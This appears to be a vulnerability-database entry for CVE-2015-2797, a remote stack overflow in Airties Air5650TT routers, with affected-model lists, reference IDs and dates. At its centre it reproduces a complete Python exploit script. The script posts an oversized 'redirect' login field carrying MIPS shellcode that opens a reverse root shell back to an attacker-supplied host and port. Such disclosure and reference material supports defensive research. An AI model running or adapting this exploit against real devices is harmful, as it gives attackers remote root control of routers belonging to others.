Details of VAR-E-201503-0127

ID

VAR-E-201503-0127

CVE

cve_id:

CVE-2015-2797

Trust: 1.3

sources: BID: 75355 // EXPLOIT-DB: 36577

EDB ID

36577

TITLE

Airties Air5650TT - Remote Stack Overflow - Multiple remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 36577

DESCRIPTION

Airties Air5650TT - Remote Stack Overflow. CVE-120335CVE-2015-2797 . remote exploit for Multiple platform

Trust: 0.6

sources: EXPLOIT-DB: 36577

AFFECTED PRODUCTS

vendor:	airties	model:	air5650tt	scope:	-	version:	-	Trust: 1.6
vendor:	airties	model:	air	scope:	eq	version:	6372	Trust: 0.3
vendor:	airties	model:	air	scope:	eq	version:	5760	Trust: 0.3
vendor:	airties	model:	air	scope:	eq	version:	5750	Trust: 0.3
vendor:	airties	model:	air 5650tt	scope:	-	version:	-	Trust: 0.3
vendor:	airties	model:	air	scope:	eq	version:	5453	Trust: 0.3
vendor:	airties	model:	air 5444tt	scope:	-	version:	-	Trust: 0.3
vendor:	airties	model:	air	scope:	eq	version:	5443	Trust: 0.3
vendor:	airties	model:	air	scope:	eq	version:	5442	Trust: 0.3
vendor:	airties	model:	air	scope:	eq	version:	5343	Trust: 0.3
vendor:	airties	model:	air	scope:	eq	version:	5342	Trust: 0.3
vendor:	airties	model:	air	scope:	eq	version:	5341	Trust: 0.3
vendor:	airties	model:	air	scope:	eq	version:	5021	Trust: 0.3
vendor:	airties	model:	air	scope:	eq	version:	1.0.2.0	Trust: 0.3

sources: BID: 75355 // EXPLOIT-DB: 36577 // EDBNET: 60662

EXPLOIT

#!/usr/bin/env python
#####################################################################################
# Exploit for the AIRTIES Air5650v3TT
# Spawns a reverse root shell
# Author: Batuhan Burakcin
# Contact: batuhan@bmicrosystems.com
# Twitter: @batuhanburakcin
# Web: http://www.bmicrosystems.com
#####################################################################################

import sys
import time
import string
import socket, struct
import urllib, urllib2, httplib

if __name__ == '__main__':

try:
ip = sys.argv[1]
revhost = sys.argv[2]
revport = sys.argv[3]
except:
print "Usage: %s <target ip> <reverse shell ip> <reverse shell port>" % sys.argv[0]

host = struct.unpack('>L',socket.inet_aton(revhost))[0]
port = string.atoi(revport)

shellcode = ""
shellcode += "\x24\x0f\xff\xfa\x01\xe0\x78\x27\x21\xe4\xff\xfd\x21\xe5\xff\xfd"
shellcode += "\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\xaf\xa2\xff\xff"
shellcode += "\x8f\xa4\xff\xff\x34\x0f\xff\xfd\x01\xe0\x78\x27\xaf\xaf\xff\xe0"
shellcode += "\x3c\x0e" + struct.unpack('>cc',struct.pack('>H', port))[0] + struct.unpack('>cc',struct.pack('>H', port))[1]
shellcode += "\x35\xce" + struct.unpack('>cc',struct.pack('>H', port))[0] + struct.unpack('>cc',struct.pack('>H', port))[1]
shellcode += "\xaf\xae\xff\xe4"
shellcode += "\x3c\x0e" + struct.unpack('>cccc',struct.pack('>I', host))[0] + struct.unpack('>cccc',struct.pack('>I', host))[1]
shellcode += "\x35\xce" + struct.unpack('>cccc',struct.pack('>I', host))[2] + struct.unpack('>cccc',struct.pack('>I', host))[3]
shellcode += "\xaf\xae\xff\xe6\x27\xa5\xff\xe2\x24\x0c\xff\xef\x01\x80\x30\x27"
shellcode += "\x24\x02\x10\x4a\x01\x01\x01\x0c\x24\x11\xff\xfd\x02\x20\x88\x27"
shellcode += "\x8f\xa4\xff\xff\x02\x20\x28\x21\x24\x02\x0f\xdf\x01\x01\x01\x0c"
shellcode += "\x24\x10\xff\xff\x22\x31\xff\xff\x16\x30\xff\xfa\x28\x06\xff\xff"
shellcode += "\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e\x2f"
shellcode += "\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff\xec"
shellcode += "\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24\x02\x0f\xab"
shellcode += "\x01\x01\x01\x0c"

data = "\x41"*359 + "\x2A\xB1\x19\x18" + "\x41"*40 + "\x2A\xB1\x44\x40"
data += "\x41"*12 + "\x2A\xB0\xFC\xD4" + "\x41"*16 + "\x2A\xB0\x7A\x2C"
data += "\x41"*28 + "\x2A\xB0\x30\xDC" + "\x41"*240 + shellcode + "\x27\xE0\xFF\xFF"*48

pdata = {
'redirect' : data,
'self' : '1',
'user' : 'tanri',
'password' : 'ihtiyacmyok',
'gonder' : 'TAMAM'
}

login_data = urllib.urlencode(pdata)
#print login_data

url = 'http://%s/cgi-bin/login' % ip
header = {}
req = urllib2.Request(url, login_data, header)
rsp = urllib2.urlopen(req)

Trust: 1.0

sources: EXPLOIT-DB: 36577

EXPLOIT LANGUAGE

Trust: 0.6

sources: EXPLOIT-DB: 36577

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 36577

TYPE

Remote Stack Overflow

Trust: 1.6

sources: EXPLOIT-DB: 36577 // EDBNET: 60662

CREDITS

Batuhan Burakcin

Trust: 0.6

sources: EXPLOIT-DB: 36577

EXTERNAL IDS

db:	EXPLOIT-DB	id:	36577	Trust: 1.6
db:	NVD	id:	CVE-2015-2797	Trust: 1.3
db:	EDBNET	id:	60662	Trust: 0.6
db:	BID	id:	75355	Trust: 0.3

sources: BID: 75355 // EXPLOIT-DB: 36577 // EDBNET: 60662

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2015-2797	Trust: 1.0
url:	https://www.exploit-db.com/exploits/36577/	Trust: 0.6
url:	http://www.airties.com/	Trust: 0.3
url:	http://www.bmicrosystems.com/blog/exploiting-the-airties-air-series/	Trust: 0.3

sources: BID: 75355 // EXPLOIT-DB: 36577 // EDBNET: 60662

SOURCES

db:	BID	id:	75355
db:	EXPLOIT-DB	id:	36577
db:	EDBNET	id:	60662

LAST UPDATE DATE

2022-07-27T09:27:23.204000+00:00

SOURCES UPDATE DATE

db:

BID

id:

75355

date:

2015-06-23T00:00:00

SOURCES RELEASE DATE

db:	BID	id:	75355	date:	2015-06-23T00:00:00
db:	EXPLOIT-DB	id:	36577	date:	2015-03-31T00:00:00
db:	EDBNET	id:	60662	date:	2015-03-31T00:00:00